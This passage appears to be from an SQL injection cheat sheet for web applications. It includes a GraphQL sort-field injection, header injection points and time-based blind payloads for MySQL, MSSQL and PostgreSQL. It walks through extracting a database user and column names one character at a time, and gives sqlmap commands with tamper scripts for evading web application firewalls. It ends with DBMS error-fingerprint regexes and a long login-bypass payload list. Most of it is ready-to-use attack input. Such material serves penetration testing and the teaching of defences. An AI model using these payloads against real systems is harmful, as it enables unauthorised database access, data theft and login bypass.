{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name Payload","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}
Example:
{"operationName":"pages","variables":{"offset":0,"limit":10,"sortc":"name AND sleep(5)","sortrev":false},"query":"query pages($offset: Int!, $limit: Int!, $sortc: String, $sortrev: Boolean) {\n pages(offset: $offset, limit: $limit, sortc: $sortColumn, sortReverse: $sortReverse) {\n id\n n\n __typen\n }\n me {\n firstN\n lastN\n usern\n __typen\n }\n components {\n title\n __typen\n }\n templates {\n title\n __typen\n }\n fonts {\n n\n __typen\n }\n partners {\n id\n n\n banners {\n n\n __typen\n }\n __typen\n }\n}\n"}
6. HTTP header based (error based, time based) — append the payload to the existing header value, either directly or after a separating space:
Referer: https://redact.com/408685756payload
Cookie: _gcl_au=1.1.2127391584.1587087463payload
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87Payload
or
Referer: https://redact.com/408685756 payload
Cookie: _gcl_au=1.1.2127391584.1587087463 payload
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Payload
X-Forwarded-For: payload
Mysql Error Based:
[IMG]https://miro.medium.com/v2/resize:fit:700/1*u9-N09vB98GeqnEuLqPQCQ.jpeg[/IMG]
Mysql Error Based
Mssql Error Based:
[IMG]https://miro.medium.com/v2/resize:fit:700/1*QkLcrAGYZARVxDv_jBArYg.jpeg[/IMG]
Mssql Error Based
7. Blind SQL injection exploitation (manual):
MySQL time based:
Resulting query (with malicious SLEEP injected): SELECT * FROM products WHERE id=1-SLEEP(5)
Resulting query (with malicious BENCHMARK injected): SELECT * FROM products WHERE id=1-BENCHMARK(100000000, rand())
Resulting query (time-based check of the database version): SELECT * FROM products WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(5), 0)
Time based SQLi: 1 and (select sleep(5) from users where SUBSTR(table_name,1,1) = 'A')#
(note: sleep() inside a row-returning subquery fires once per matching row, so the total delay scales with the number of rows — keep the subquery narrow or add LIMIT 1)
Error blind SQLi: AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
(the inner SELECT returns many rows, so when the IF condition is true MySQL raises a "subquery returns more than 1 row" error instead of completing normally — the error/no-error difference is the oracle)
"Ultimate" SQL injection payload (falls back to BENCHMARK() when SUBSTR(@@version,1,1)<5, i.e. on old MySQL versions that have no SLEEP()): SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
Exploitation:
redact.com/page/search?q=1 and sleep(5)--
Current user:
redact.com/page/search?q=1 and if(substring(user(),1,1)='a',SLEEP(5),1)--
redact.com/page/search?q=1 and if(substring(user(),2,1)='a',SLEEP(5),1)--
redact.com/page/search?q=1 and if(substring(user(),3,1)='a',SLEEP(5),1)--
Table name guessing:
redact.com/page/search?q=1 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
redact.com/page/search?q=1 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
redact.com/page/search?q=1 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--
MSSQL time based (the T-SQL keyword is WAITFOR, one word):
Resulting query (with malicious delay injected): SELECT * FROM products WHERE id=1; WAITFOR DELAY '00:00:5'
Resulting query (verify if the user is sa): SELECT * FROM products WHERE id=1; IF SYSTEM_USER='sa' WAITFOR DELAY '00:00:5'
Exploitation:
http://redact.com/page.aspx?id=1; WAITFOR DELAY '00:00:5'-- (+5 seconds)
Time-based extraction of the current database user
Determine the length of USER (every request below uses the same injection point, http://redact.com/page.aspx?id=1):
http://redact.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=4) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (LEN(USER)=5) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = 5 characters in length
Once the length is known, find the CHAR (ASCII) value of each position one character at a time, narrowing with > comparisons and confirming with =, like this (only the requests marked "+5 seconds" were delayed):
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>96) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>50) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))>98) WAITFOR DELAY '00:00:5'--
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the first character CHAR value is 97, which is an "a"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))>99) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=100) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the second character CHAR value is 100, which is a "d"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))>108) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the third character CHAR value is 109, which is the letter "m"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))>104) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),4,1)))=105) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Result = the fourth character CHAR value is 105, which is an "i"
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))>109) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),5,1)))=110) WAITFOR DELAY '00:00:5'-- (+5 seconds)
The fifth character position has CHAR value 110, which is the letter "n"
Database user = 97,100,109,105,110 = admin
Time-based extraction of the first table's columns:
Let's enumerate some columns from the table(s) we found. Check the length first before you start testing character by character (LEN() takes an expression, so the subquery needs its own pair of parentheses):
http://redact.com/page.aspx?id=1; IF (LEN((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'))=4) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),1,1)))=117) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),2,1)))=115) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),3,1)))=101) WAITFOR DELAY '00:00:5'-- (+5 seconds)
http://redact.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from testDB.information_schema.columns where table_name='Members'),4,1)))=114) WAITFOR DELAY '00:00:5'-- (+5 seconds)
Column name = 117,115,101,114 = user
(TOP 1 without an ORDER BY is not guaranteed to return the same column on every request; add ORDER BY ordinal_position and page with OFFSET ... FETCH, or exclude names already found, when walking the remaining columns.)
PostgreSQL blind SQLi (stacked queries):
id=1; select pg_sleep(5);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(5) end;-- -
8. Blind SQL injection exploitation via sqlmap (note: `--risk=3` enables OR-based tests, which can alter or delete rows if the injection lands in an UPDATE/DELETE statement, and `--level=5` also tests cookies and headers — use both deliberately on production targets):
sqlmap -r req.txt -v 3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=BT --current-db
9. Blind SQL injection WAF bypass (sqlmap tamper scripts):
Example: sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --tamper=between --current-db
MySQL, MSSQL, PostgreSQL, Oracle (blind): between
MySQL (blind): ifnull2casewhenisnull, ifnull2ifisnull
MySQL, MSSQL, PostgreSQL, Oracle (blind): charencode
MySQL, MSSQL, PostgreSQL (blind): charunicodeencode
MySQL (blind): commalesslimit, commalessmid
MySQL (blind): escapequotes
UTF-8 (blind): apostrophemask, overlongutf8, overlongutf8more
Bypass WAF in JSON (blind): charunicodeescape
MySQL, PostgreSQL, Oracle (blind): greatest
Cloudflare WAF (blind): xforwardedfor
And
Quick SQLMap Tamper Suggester: (external link not available in this copy)
10. SQL detection payloads (generic, error based):
'"'"./\%5c%27%22%23%3B)")')))"))'))#;''```,""//\\%%00||0.or-1%23'or-1%23#
Detection source — error-message fingerprints to match in the response, per DBMS (a hit identifies the backend and confirms the input reached the query parser):
MySQL: ["SQL syntax.*MySQL", "Warning.*mysql_.*", "valid MySQL result", "MySqlClient\."]
PostgreSQL: ["PostgreSQL.*ERROR", "Warning.*\Wpg_.*", "valid PostgreSQL result", "Npgsql\."]
Microsoft SQL Server: ["Driver.* SQL[\-\_\ ]*Server", "OLE DB.* SQL Server", "(\W|\A)SQL Server.*Driver", "Warning.*mssql_.*", "(\W|\A)SQL Server.*[0-9a-fA-F]{8}", "(?s)Exception.*\WSystem\.Data\.SqlClient\.", "(?s)Exception.*\WRoadhouse\.Cms\."]
Microsoft Access: ["Microsoft Access Driver", "JET Database Engine", "Access Database Engine"]
Oracle: ["\bORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*Driver", "Warning.*\Woci_.*", "Warning.*\Wora_.*"]
IBM DB2: ["CLI Driver.*DB2", "DB2 SQL error", "\bdb2_\w+\("]
SQLite: ["SQLite/JDBCDriver", "SQLite.Exception", "System.Data.SQLite.SQLiteException", "Warning.*sqlite_.*", "Warning.*SQLite3::", "\[SQLITE_ERROR\]"]
Sybase: ["(?i)Warning.*sybase.*", "Sybase message", "Sybase.*Server message.*"]
11. SQL injection authentication bypass (login-form payloads; note that the `OR 1=1` / `OR 'x'='x'` conditions are not safe to send blindly — if the same input also reaches an UPDATE or DELETE statement, the condition matches every row):
'=' 'or'' or ''='/1#\'-'' ''&''^''*'' or ''-'' or '' '' or ''&'' or ''^'' or ''*'"-"" ""&""^""*"" or ""-"" or "" "" or ""&"" or ""^"" or ""*"or true--" or true--' or true--") or true--') or true--admin' --admin' #admin'/*admin' or '1'='1admin' or '1'='1'--admin' or '1'='1'#admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin") or ("1"="1admin") or ("1"="1"--admin") or ("1"="1"#admin") or ("1"="1"/*admin") or "1"="1admin") or "1"="1"--admin") or "1"="1"#admin") or "1"="1"/*' or 'x'='x') or ('x')=('x')) or (('x'))=(('x" or "x"="x") or ("x")=("x")) or (("x"))=(("x1'or'1'='1or 1=1or 1=1--or 1=1#or 1=1/*admin' or '1'='1'/*admin') or ('1'='1admin') or ('1'='1'--admin') or ('1'='1'#admin') or ('1'='1'/*admin') or '1'='1admin') or '1'='1'--admin') or '1'='1'#admin') or '1'='1'/*admin" --admin" #admin"/*admin" or "1"="1admin" or "1"="1"--admin" or "1"="1"#admin" or "1"="1"/*admin"or 1=1 or ""="admin" or 1=1admin" or 1=1--admin" or 1=1#admin" or 1=1/*